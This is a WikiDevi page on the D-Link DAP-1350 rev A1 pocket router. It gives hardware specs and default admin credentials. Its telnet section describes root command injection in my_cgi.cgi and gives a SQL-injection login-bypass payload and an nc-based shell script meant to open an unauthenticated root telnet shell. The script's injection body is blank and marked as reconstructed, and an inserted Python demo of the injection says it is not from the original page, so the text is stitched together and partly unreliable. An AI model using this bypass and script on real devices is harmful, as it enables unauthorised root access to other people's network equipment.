
D-Link DAP-1350 rev A1

From WikiDevi

D-Link DAP-1350 A1
Availability: now

Manuf/OEM/ODM Cameo

FCC approval date: 15 September 2009
Country of manuf.: China

Amazon: B003Q9AZHU (US listing)
multiple revisions of this device, use caution

Type: wireless router, access point

Industry Canada ID: 4216A-AP1350

Power: 5 VDC, 2.5 A
Connector type: barrel

CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB (Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB (ESMT M12L128168A-7T × 2)

Expansion IFs: USB 2.0
USB ports: 1

WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none

ETH chip1: Ralink RT3052
LAN speed: 10/100
LAN ports: 1

Stock FW OS: Linux

Third party firmware supported: OpenWrt

Default SSID: dlink (38 addl. devices)
Default IP address:
the IP is used by 62 additional devices, all of them D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 314 additional devices, 179 of them D-Link devices

802dot11 OUI: 00:18:E7 (10 E, 20 W, 2008)
Ethernet OUI: 00:18:E7 (10 E, 20 W, 2008)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.

Wireless N Pocket Router & Access Point

Product page • Interface emulator

Forum threads

OpenWrt trunk contains support for the DAP-1350; however, the 12.09-beta build is broken.
You can build your own firmware from trunk now or wait for the Attitude Adjustment release.

Enabling telnet

A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root via HTTP POST requests to a CGI program (my_cgi.cgi, the same endpoint the script below talks to).

A secondary SQL injection vulnerability in the login handler also exists, allowing HTTP authentication to be bypassed: submitting the user name admin with the password value  ';select 1;--  is accepted as a valid login, so the command-injection request can be sent without knowing the admin password.
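The following is an added example, not code from the WikiDevi page or from D-Link's firmware. It shows why the documented password value  ';select 1;--  defeats a login check that builds its SQL by string concatenation and treats "the query produced a row" as "authenticated", and why the same input fails against a parameterised query. The table name, column names, query shape and the use of SQLite are assumptions for illustration only; the page does not show the real my_cgi.cgi query or its database.

```python
"""Added example: mechanism of the  ';select 1;--  login bypass.

Assumptions (not from the page): a table users(user_name, user_pwd), a
login query of the form  SELECT 1 FROM users WHERE user_name='..' AND
user_pwd='..', and an application that runs the whole string with a
sqlite3_exec()-style multi-statement call and treats any returned row
as a successful login.
"""
import sqlite3

USER = "admin"
REAL_PASSWORD = "s3cret"        # constructed sample; deliberately not blank
SQLI_PAYLOAD = "';select 1;--"  # the password value documented on the page


def make_db():
    """In-memory SQLite table standing in for the device's credential store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, user_pwd TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (USER, REAL_PASSWORD))
    conn.commit()
    return conn


def exec_all(conn, sql):
    """Mimic sqlite3_exec(): run every ';'-separated statement in turn and
    collect the rows any of them return.  Python's Cursor.execute refuses
    multi-statement strings, which is the only reason this helper exists.
    The split is naive (a ';' inside a string literal would break it);
    that is acceptable for this demonstration."""
    rows = []
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt or stmt.startswith("--"):
            continue  # skip the trailing comment the payload injects
        rows.extend(conn.execute(stmt).fetchall())
    return rows


def vulnerable_login(conn, user_name, user_pwd):
    """String-built query; 'any row came back' counts as success.
    With the payload the string becomes
      SELECT 1 FROM users WHERE user_name='admin' AND user_pwd='';select 1;--'
    The first statement matches nothing, the injected  select 1  returns a
    row, and the comment swallows the dangling quote."""
    sql = ("SELECT 1 FROM users WHERE user_name='%s' AND user_pwd='%s'"
           % (user_name, user_pwd))
    return len(exec_all(conn, sql)) > 0


def hardened_login(conn, user_name, user_pwd):
    """Parameterised query: the payload is compared as an ordinary string."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE user_name=? AND user_pwd=?",
        (user_name, user_pwd)).fetchone()
    return row is not None


def demo():
    """Return the four login outcomes: real and injected password against
    the vulnerable and the hardened check."""
    conn = make_db()
    return {
        "vuln_real": vulnerable_login(conn, USER, REAL_PASSWORD),
        "vuln_payload": vulnerable_login(conn, USER, SQLI_PAYLOAD),
        "hard_real": hardened_login(conn, USER, REAL_PASSWORD),
        "hard_payload": hardened_login(conn, USER, SQLI_PAYLOAD),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(name, "authenticated" if ok else "rejected")
```

The demo uses a non-blank sample password on purpose: with the factory admin:blank credentials the first statement would already match on its own, and the bypass would not be attributable to the injected  select 1 .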

#!/bin/sh
# DAP-1350 telnetd, by brynet.
# This affects all stock firmware images for the device.
# Tested on OpenBSD.
#
# The copy of this script on this page lost several lines (the fi/else
# keywords, the host assignment and the request variables); they are
# restored below. The POST body that makes the CGI start telnetd was not
# preserved and is left empty, so it must be filled in before use.

if [ $# -ne 1 ]; then
	echo "usage: $0 host or ip"
	exit 1;
fi
host=$1

# Both requests go to the same CGI. The query string appears to mirror the
# random cache-buster the device's web UI appends; it plays no part in the attack.
base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"

# Authentication bypass via SQL injection in the login handler:
# user_name=admin
# user_pwd=';select 1;--
# (sent as-is, without URL encoding)
login_cmd="user_name=admin&user_pwd=';select 1;--"
login_clen="Content-Length: $(printf '%s' "${login_cmd}" | wc -c | tr -d ' ')\r\n\r\n"
login_req="${base_req}${login_clen}${login_cmd}"

# printf '%b' expands the \r\n escapes portably; a successful login is
# recognised by the string "default" in the response.
printf '%b' "${login_req}" | nc "${host}" 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Authenticated."
else
	echo "Failed."
	exit 1;
fi

# Command injection: the POST body (not preserved on this page) that makes
# my_cgi.cgi spawn telnetd as root.
telnetd_cmd=""
telnetd_clen="Content-Length: $(printf '%s' "${telnetd_cmd}" | wc -c | tr -d ' ')\r\n\r\n"
telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"

printf '%b' "${telnetd_req}" | nc "${host}" 80 > /dev/null 2>&1
# give telnetd a moment to start, then probe port 23
sleep 2; nc -z "${host}" 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Root shell, okey doke."
	telnet "${host}"
else
	echo "No root.. sorry, heh."
	exit 1;
fi

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

    $ ./ dlinkap #
    Root shell, okey doke.
    Connected to dlinkap.
    Escape character is '^]'.
    ... motd/etc.

The factory-set root password is unknown, so telnetd is started without a login(1) process and drops straight to a root shell; the resulting telnet service accepts connections without any credentials.
The change is not persistent: you must run the exploit script again each time the device is powered on.